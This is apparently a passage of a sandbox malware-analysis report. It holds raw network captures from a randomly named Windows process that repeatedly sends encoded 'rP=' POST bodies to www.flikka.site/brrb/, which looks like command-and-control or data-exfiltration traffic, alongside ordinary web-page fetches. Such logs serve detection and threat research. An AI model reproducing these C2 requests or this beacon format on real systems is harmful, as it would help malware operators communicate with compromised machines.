                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UjHYZyHvwzHCSDoCM5s1iOqSX00sSzrK%2F2%2BqIe0qRkduGgQagp83h8%2FMkoiufNjgKYNUDa7rv114DpR5xWldq4%2Be6%2BrtephnSpL0ygZtixuRKDZ6vDDkXBvQki8t%2Fgbu"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62807c14e936-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=523&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 33 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c
                                                                                      Data Ascii: 130d<!DOCTYPE html><html class="js cssanimations"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content=""> <meta name="keywords" content=""> <
                                                                                      Nov 13, 2024 09:27:50.170670033 CET  212 bytes  IN  Data Raw: 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 47 56 4a 54
                                                                                      Data Ascii: meta name="viewport" content="width=device-width, initial-scale=1"> <title>GVJTBEST</title> <meta name="renderer" content="webkit"> <meta http-equiv="Cache-Control" content="no-siteapp"> <meta nam
                                                                                      Nov 13, 2024 09:27:50.170703888 CET  1236 bytes  IN  Data Raw: 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61
                                                                                      Data Ascii: e="mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-title" content="Amaze UI"><met
                                                                                      Nov 13, 2024 09:27:50.170758009 CET  1236 bytes  IN  Data Raw: 69 6e 64 65 78 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 39 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 39 70
                                                                                      Data Ascii: index: 6; height: 49px; margin:0 auto; line-height: 49px; padding: 0 10px; width: 100%; text-align: center; background-color: #fff; } @media screen and (min-width: 75
                                                                                      Nov 13, 2024 09:27:50.170793056 CET  1236 bytes  IN  Data Raw: 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 6d 2d 68 65 61 64 65 72 20 2e 61 6d 2d 68 65 61 64 65 72 2d 74 69 74 6c 65 20 69 6d 67 20 7b
                                                                                      Data Ascii: { background-color: #fff; } .am-header .am-header-title img { margin-top: 15px; height: 20px; width: 100px; vertical-align: top; } #about-us-detail { margin: 3px; }
                                                                                      Nov 13, 2024 09:27:50.170828104 CET  694 bytes  IN  Data Raw: 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 6e 76 69 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 74 65 78 74 22 3e e9 a6 96 e9 a1 b5 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c
                                                                                      Data Ascii: <span class="canvi-navigation__text"></span> </a> </li> <li> <span class="canvi-navigation__item" id='about-us-title'> <span class="canvi-navigation__icon-wrapper"
                                                                                      Nov 13, 2024 09:27:50.170856953 CET  694 bytes  IN  Data Raw: 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 6e 76 69 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 74 65 78 74 22 3e e9 a6 96 e9 a1 b5 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c
                                                                                      Data Ascii: <span class="canvi-navigation__text"></span> </a> </li> <li> <span class="canvi-navigation__item" id='about-us-title'> <span class="canvi-navigation__icon-wrapper"
                                                                                      Nov 13, 2024 09:27:50.170996904 CET  1236 bytes  IN  Data Raw: 32 35 36 30 0d 0a e7 89 a9 e6 b5 81 e6 a2 9d e6 ac be 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 09 09 09 20 3c 6c 69 3e 20 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 74 68 2e 68 74 6d 6c 22 3e e9 80 80 e6 8f 9b e6 94 bf e7 ad 96 3c 2f 61 3e 3c 2f 6c
                                                                                      Data Ascii: 2560</a></li> <li> <a href="/about/th.html"></a></li> <li> <a href="/about/ys.html"></a></li> <li> <a href="/about/lxwm.html"></a></li> </ul>
                                                                                      Nov 13, 2024 09:27:50.171034098 CET  212 bytes  IN  Data Raw: 8d e5 8b 99 e6 99 82 e9 96 93 ef bc 9a 28 55 54 43 2f 47 4d 54 2b 30 38 3a 30 30 29 3c 62 72 3e 39 3a 30 30 2d 31 38 3a 30 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f
                                                                                      Data Ascii: (UTC/GMT+08:00)<br>9:00-18:00</span> </span> </li> </ul> <div style="border-bottom: 1px dashed #dcdcdc;"></div></aside><div class="cus-header"> <span cl
                                                                                      Nov 13, 2024 09:27:50.171065092 CET  1236 bytes  IN  HTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:49 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UjHYZyHvwzHCSDoCM5s1iOqSX00sSzrK%2F2%2BqIe0qRkduGgQagp83h8%2FMkoiufNjgKYNUDa7rv114DpR5xWldq4%2Be6%2BrtephnSpL0ygZtixuRKDZ6vDDkXBvQki8t%2Fgbu"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62807c14e936-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=523&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 33 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c
                                                                                      Data Ascii: 130d<!DOCTYPE html><html class="js cssanimations"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content=""> <meta name="keywords" content=""> <
                                                                                      Nov 13, 2024 09:27:50.177561998 CET  1236 bytes  IN  Data Raw: 61 73 73 3d 22 6a 73 2d 63 61 6e 76 69 2d 6f 70 65 6e 2d 62 75 74 74 6f 6e 2d 2d 6c 65 66 74 20 63 75 73 2d 68 65 61 64 65 72 2d 6c 65 66 74 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65
                                                                                      Data Ascii: ass="js-canvi-open-button--left cus-header-left"><img src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png" alt=""></span> <span class="cus-header-mid" style="color:black;font-weight:bold;">GVJTBEST </span>
                                                                                      Nov 13, 2024 09:27:50.177597046 CET  1236 bytes  IN  Data Raw: 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 37 35 25 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20
                                                                                      Data Ascii: flex-direction: column; height: 75%; justify-content: center; align-items: center; /*overflow: hidden;*/ /*flex-shrink:0;*/}.sp_img img { width: auto; height: auto; max-width: 94%; max-he


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      17          192.168.2.4  59058        67.223.117.142  80                2800  C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 13, 2024 09:27:55.328007936 CET  783 bytes  OUT  POST /brrb/ HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.flikka.site
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.flikka.site/brrb/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 43 63 70 5a 64 6c 68 6d 36 35 45 6a 69 62 53 61 41 41 4a 45 35 35 46 74 51 71 48 31 64 31 79 59 67 5a 6e 48 53 4f 6c 55 78 67 58 47 67 4e 52 47 45 6a 6d 6d 50 70 65 61 6d 32 6b 46 59 75 70 6a 74 62 6a 45 67 79 42 6b 61 68 59 6f 46 6b 54 47 76 70 32 70 55 53 31 54 55 6b 70 32 57 69 6e 44 2f 51 57 45 58 36 35 45 7a 50 79 75 55 4c 79 70 6e 69 6d 5a 36 6d 54 66 4c 6a 4e 48 54 42 78 6a 5a 6f 49 34 61 2f 4a 66 32 48 6e 66 69 4b 50 59 34 43 37 5a 4c 76 6c 68 77 77 62 41 73 36 4f 37 4c 2b 77 54 36 4c 46 31 6b 39 46 38 76 71 75 78 71 48 6a 71 30 77 3d 3d
                                                                                      Data Ascii: rP=Cw0Zy0LVBM79CcpZdlhm65EjibSaAAJE55FtQqH1d1yYgZnHSOlUxgXGgNRGEjmmPpeam2kFYupjtbjEgyBkahYoFkTGvp2pUS1TUkp2WinD/QWEX65EzPyuULypnimZ6mTfLjNHTBxjZoI4a/Jf2HnfiKPY4C7ZLvlhwwbAs6O7L+wT6LF1k9F8vquxqHjq0w==
                                                                                      Nov 13, 2024 09:27:55.994162083 CET  533 bytes  IN  HTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:27:55 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      18          192.168.2.4  59069        67.223.117.142  80                2800  C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 13, 2024 09:27:57.863544941 CET  803 bytes  OUT  POST /brrb/ HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.flikka.site
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.flikka.site/brrb/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 47 59 67 38 62 48 56 4e 39 55 77 67 58 47 72 74 52 44 4c 44 6d 68 50 70 44 77 6d 33 59 46 59 75 74 6a 74 65 48 45 67 44 42 6e 56 52 59 6d 51 30 54 2b 73 5a 32 70 55 53 31 54 55 6e 56 49 57 6d 44 44 34 68 6d 45 57 62 35 48 76 2f 79 68 54 4c 79 70 6a 69 6d 56 36 6d 54 35 4c 69 52 68 54 48 31 6a 5a 70 34 34 61 71 39 59 74 33 6e 56 38 36 4f 70 34 43 6a 64 46 4f 59 4d 32 78 62 4a 79 61 37 64 48 59 39 4a 72 36 6b 69 32 39 68 50 79 74 6e 46 6e 45 65 6a 76 35 44 4f 39 4d 63 41 30 55 31 59 65 62 4d 66 53 36 57 37 36 59 34 3d
                                                                                      Data Ascii: rP=Cw0Zy0LVBM79D9ZZYCVmqpEkt7SaKgJA55JtQv/bcHGYg8bHVN9UwgXGrtRDLDmhPpDwm3YFYutjteHEgDBnVRYmQ0T+sZ2pUS1TUnVIWmDD4hmEWb5Hv/yhTLypjimV6mT5LiRhTH1jZp44aq9Yt3nV86Op4CjdFOYM2xbJya7dHY9Jr6ki29hPytnFnEejv5DO9McA0U1YebMfS6W76Y4=
                                                                                      Nov 13, 2024 09:27:58.555423975 CET  533 bytes  IN  HTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:27:58 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      19          192.168.2.4  59085        67.223.117.142  80                2800  C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                      Nov 13, 2024 09:28:00.412889004 CET  10885 bytes  OUT  POST /brrb/ HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.flikka.site
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.flikka.site/brrb/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 65 59 67 4f 44 48 54 73 39 55 69 77 58 47 6f 74 52 43 4c 44 6e 6b 50 70 4c 30 6d 33 55 56 59 6f 78 6a 73 39 2f 45 69 78 70 6e 4f 42 59 6d 53 30 54 46 76 70 32 38 55 53 6c 74 55 6e 46 49 57 6d 44 44 34 6a 2b 45 43 36 35 48 38 76 79 75 55 4c 79 62 6e 69 6e 41 36 6d 62 48 4c 69 45 61 53 32 4a 6a 5a 4a 6f 34 59 59 56 59 68 33 6e 54 39 36 4f 78 34 43 65 44 46 50 30 75 32 78 76 77 79 5a 6e 64 45 38 67 50 76 36 51 62 6a 39 78 68 77 2b 62 54 6f 54 4b 63 70 37 50 6b 7a 2b 45 65 70 56 49 31 53 38 78 71 42 36 6a 2b 6e 4e 73 61 62 47 74 37 30 65 33 56 75 4a 45 48 4f 55 66 76 2f 36 67 56 4b 4a 33 67 79 68 35 4d 34 6c 79 57 63 6b 68 33 38 2b 4b 2b 2b 53 79 6c 34 71 37 79 54 65 39 46 6a 78 73 58 41 54 79 78 73 73 50 6b 4c 6f 64 4e 36 79 74 66 45 35 7a 45 57 57 76 58 31 4e 4d 45 5a 58 2f 70 73 6e 4e 2f 33 56 51 6d 6e 2b 58 68 5a 41 64 77 61 71 67 42 66 57 7a 55 7a 32 69 59 4b 59 74 [TRUNCATED]
                                                                                      Data Ascii: rP=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 [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:01.387176991 CET | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:28:00 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                      Nov 13, 2024 09:28:01.387871981 CET | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:28:00 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID: 20 | Source: 192.168.2.4:59101 | Destination: 67.223.117.142:80 | PID: 2800 | Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:02.955741882 CET | 525 bytes | OUT | GET /brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.flikka.site
